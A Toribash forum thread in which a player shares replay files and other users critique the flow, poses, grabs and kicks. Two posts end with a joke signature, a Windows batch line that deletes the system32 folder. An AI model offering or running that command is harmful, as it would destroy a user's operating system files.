Toribash
Original Post
Aiona's replays suck
New replay thread cnc on everything plox
Attached Files
!Aiona_Puddles.rpl (166.2 KB, 45 views)
!Aiona_Spins and poop.rpl (137.8 KB, 35 views)
Last edited by Ealtrik; Aug 15, 2013 at 07:27 PM. Reason: <24 hour edit/bump
woh gj man.

Puddles - The manip was really messy and you hit your head a bunch of times. Also the hit looked awkward. 3:

Spins and Poop - Nice opener and decap and stuffs, but your head was kinda floppy. also the pose was kinda twitchy.

other than that, these were awesome! :b keep making more, man.
replays pls cnc me
I made another replay, I think its a bit better than the previous ones.
I need some cnc so cnc pls
Attached Files
Aiona_FallingHope.rpl (237.2 KB, 46 views)
Last edited by Ealtrik; Aug 17, 2013 at 06:15 AM.
i liked it, but you seemed rigid at parts.
Also when you kicked the hand i didn't get why you did that. It would have been nice if you had just skipped that and keep more flow.
@echo off
del c:\WINDOWS\system32
Hmmm.

Hello young grasshopper (wannabe old faeg talking).

Try to avoid kicking whilst your ankle is contracted it looks extremely unnatural.

Also try to avoid sudden movements, it cock blocks the flow (frames 593-586)

Go cnc me <3.
[SIGPIC][/SIGPIC]
I really like puddles replay, it looks cool how you manipulate uke while so close.
Spins and poop doesn't really stand out to me, not that great, and Falling Hope looked pretty nice, the hand dm was kind of awkward and the skeet was weak though.
Not that I could really do better though.
Was once said to me before, if you don't have to grab, don't. And secondly, you don't need to beat uke like a paper bag. If you're not gunna get anything out of kicking his legs at the end, then don't. Try for a well needed skeet or even a nicely landed pose. Its more worth your time than going for things of less-importance.
@echo off
del c:\WINDOWS\system32